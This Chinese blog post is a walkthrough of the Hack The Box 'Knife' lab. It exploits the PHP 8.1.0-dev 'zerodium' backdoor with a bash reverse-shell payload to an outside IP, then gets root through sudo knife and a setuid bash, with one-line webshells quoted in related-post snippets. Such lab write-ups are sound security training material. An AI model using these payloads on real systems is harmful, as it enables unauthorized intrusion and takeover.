Knife

最新推荐文章于 2024-05-14 09:31:04 发布
最新推荐文章于 2024-05-14 09:31:04 发布
阅读量315 收藏 1
点赞数 1
分类专栏: hack the box 文章标签: 渗透测试 网络安全 hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/118446399
版权

主机信息

在这里插入图片描述
在这里插入图片描述

服务枚举

nmap -sC -sV 10.10.10.242

在这里插入图片描述
看到对应主机开放了80端口,我们上去访问了一下页面
在这里插入图片描述
看了下页面的功能和源码,也没发现什么突破点。扫了下目录,也没有发现啥信息
在这里插入图片描述

抓包分析

因为没有思路了,我使用burpsuite进行抓包调试时,发现了X-Powered-By的对应值为PHP/8.1.0-dev。在网上搜索到对应的资料显示PHP/8.1.0-dev存在一个开发后门,加入User-Agentt字段并添加zerodium函数名作为对应值,就能实现RCE漏洞。
在这里插入图片描述
我们在User-Agentt字段中添加zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.155/9001 0>&1'")这个值
在这里插入图片描述
在这里插入图片描述

至此我们获取到了一个普通账户的权限,得到第一个flag值
在这里插入图片描述
然后就是我们的提权重头戏了,首先我们先看看sudo -l大概的信息。这里的意思是knife用户可以使用root身份来运行/usr/bin/knife这条命令
在这里插入图片描述
因此我们将要执行的恶意代码写入exploit.rb文件中。echo "system('chmod +s /bin/bash')">exploit.rb
在这里插入图片描述
chmod的+s选项是在文件执行时把进程的属主或组ID置为该文件的文件属主。执行这个文件将权限提升为root权限
在这里插入图片描述
查看到最后的root的flag值
在这里插入图片描述

平凡的学者
关注
专栏目录
【SpringBoot】22、SpringBoot中整合knife4j接口文档
Asurplus
07-02 21万+
在项目开发中,web项目的前后端分离开发,APP开发,需要由前后端工程师共同定义接口,编写接口文档,之后大家都根据这个接口文档进行开发,到项目结束前都要一直维护 接口文档使得项目开发过程中前后端工程师有一个统一的文件进行沟通交流开发,项目维护中或者项目人员更迭,方便后期人员查看、维护 一、界面先赏 1、首页 2、接口文档 3、调试 二、整合 knife4j 1、引入 maven 依赖 <!-- knife4j接口文档 start --> <dependency> &lt
[极客大挑战 2019]Knife 1
weixin_45674567的博客
05-29 2908
白给的shell,用蚁剑 蚁剑下载 点击进去,左边查看目录 点击获取
[极客大挑战 2019]Knife
yaoge1225的博客
07-18 367
BUUCTF刷题记录 [极客大挑战 2019]Knife 菜刀 emmm 我用的蚁剑没差 菜刀后门多 蚁剑github上下载
BUUCTF [极客大挑战 2019]Knife
CrotZZ的博客
07-05 696
打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现 设置好URL和链接密码 找到flag文件 打开后找到flag 文件上传漏洞 一句话木马: php <?php echo @eval($_POST['shell']);?> Asp <%execute(request(“value”))%> Aspx <%@ Page Language=“Jscript”%> <%eval(Request.Item[“value”])%> 前端判.
掌握 Burp Suite 的小巧刃器:Knife 插件
gitblog_00081的博客
05-14 691
掌握 Burp Suite 的小巧刃器:Knife 插件 knifeA burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅项目地址:https://gitcode.com/gh_mirrors/kni/knife 在网络攻防的世界里, Burp Suite 是一款强大的安全测试工具,它...
Knife4j_接口概述、常用注解详解、搭建swagger项目、功能概述
所得皆惊喜
10-07 4758
Knife4j_接口概述、常用注解详解、搭建swagger项目、功能概述
knife4j(4.0~4.1版本)
07-29
Knife4j是一个集Swagger2 和 OpenAPI3为一体的增强解决方案。 1)基础特性:兼容OpenAPI 2.0、兼容OpenAPI 3.0 2)增强扩展: 基础ui组件(自定义文档、动态参数调试、I18n、接口排序、导出等); 基于Springfox框架+...
Knife4j v4.5.0.zip
03-25
Knife4j v4.5.0:一款强大的API开发辅助工具详解》 Knife4j,作为一款专注于Java Web API开发的文档生成工具,自发布以来就受到了广大开发者们的热烈欢迎。本次我们聚焦的是它的最新版本——Knife4j v4.5.0,该...
Knife4j官网(源代码)
02-21
Knife4j官网 一、官网 二、简介 三、快速开始(Spring Boot 2 + OpenAPI2) 四、Spring Boot 2 4.1 OpenAPI2 4.2 OpenAPI3 五、迭代计划 六、介绍 七、实战指南 7.1 Spring单体架构 7.1.1 基于Maven Bom方式使用 7.1.2...
Swagger和knife4j_swagger_Swagger和knife4j_knife4jswagger_
09-30
Swagger 和 Knife4j 是两个广泛应用于 API 文档生成与管理的工具,主要服务于 RESTful 风格的 Web 服务。Swagger 提供了一种规范化的 JSON 格式(OpenAPI Specification)来描述 API,使得开发者可以自动生成 API ...
knife-1.8-jar-with-dependencies.jar
04-21
一个将有用的小功能加入到右键菜单的burp suite插件,github:https://github.com/bit4woo/knife
DVWA系列(九)——使用Burpsuite进行File Upload(文件上传)
橘子女侠
05-07 1万+
1. 文件包含(File Upload)漏洞简介 (1)文件上传 File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限; 这里上传的文件可以是木马,病毒,恶意脚本等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理...
burpsuite爆破3个变量_BurpSuite中的奇滛技巧V1.0
weixin_39630410的博客
11-28 440
如果每个人都理解你,你得普通成什么样前言 分享一些使用burp中自己常用的技巧,觉得实用的话记得分享一下哦~1.快速生成CSRF测试代码 测试csrf漏洞时候,快速生成scrf的html的代码。2.自动挖xss 在请求头中自动加入xss代码,这样就可以每次自动的撸xss啦3.只想看某一个站流量 有时候history会有一堆网站,我只想看目标站的流...
BurpSuite中的奇滛技巧V1.0
KHOST的博客
04-09 421
前言 分享一些使用burp中自己常用的技巧,觉得实用的话记得分享一下哦~ 1.快速生成CSRF测试代码 测试csrf漏洞时候,快速生成scrf的html的代码。 2.自动挖xss 在请求头中自动加入xss代码,这样就可以每次自动的撸xss啦 3.只想看某一个站流量 有时候history会有一堆网站,我只想看目标站的流量咋办。...
CTF-Web-[极客大挑战 2019]Knife
归子莫的博客
05-03 5770
CTF-Web-[极客大挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
BUUCTF:[极客大挑战 2019]Knife
末初的CSDN博客
10-20 666
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
ButterKnife使用方法详解
热门推荐
孤独的冥王星
06-04 5万+
介绍 ButterKnife是一个专注于Android系统的View注入框架,以前总是要写很多findViewById来找到View对象,有了ButterKnife可以很轻松的省去这些步骤。使用ButterKnife对性能基本没有损失,因为ButterKnife用到的注解并不是在运行时反射的,而是在编译的时候生成新的class。 GitHub地址:https://github.com/Jake...
[9]DevOps 自动化运维工具Chef---如何解决在Window平台上执行一些knife子命令时所报的错误, knife search, knife status?
超越梦想,一起飞!!!
09-27 2812
有的时候,我们需要window平台上执行一些knife子命令,比如,knife status --run-list 查看运行的run list的状态,knife search '*:*' -i 搜索所有的子节点 这个时候如果运行的话,就会出现下面的错误提示,Cannot sign the request without a client name, check that :node_name is assigned.那么为什么会出现这个错误?如何解决呢?且听笔者缓缓道来。
knife4传值数组
最新发布
09-21
Knife是Chef的一个命令行工具,主要用于管理和配置 Chef 的客户端和服务。如果你要在knife命令中传递一个值数组,你可以通过JSON格式或使用特殊的语法来完成。这里有两个常用的方式: 1. **JSON格式**: - 将值作为数组直接写入配置文件(如client.rb): ```ruby knife client create 'my-client' --config-value 'data_bag[items]' => ['item1', 'item2'] ``` - 或者在命令行里指定数组: ```bash knife client config set data_bag[items] "[\"item1\", \"item2\"]" ``` 2. **逗号分隔(适用于较简单的场景)**: 使用`--attribute`选项,将数组项用逗号分隔: ```bash knife client create 'my-client' --attribute 'data_bag[items]'='item1,item2' ``` 这种方式会将字符串视为一个CSV列表,但可能不适合复杂结构的数组。 请注意,不同的knife命令可能会有不同的参数接受方式,确保查阅具体的knife命令帮助文档来了解正确的语法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值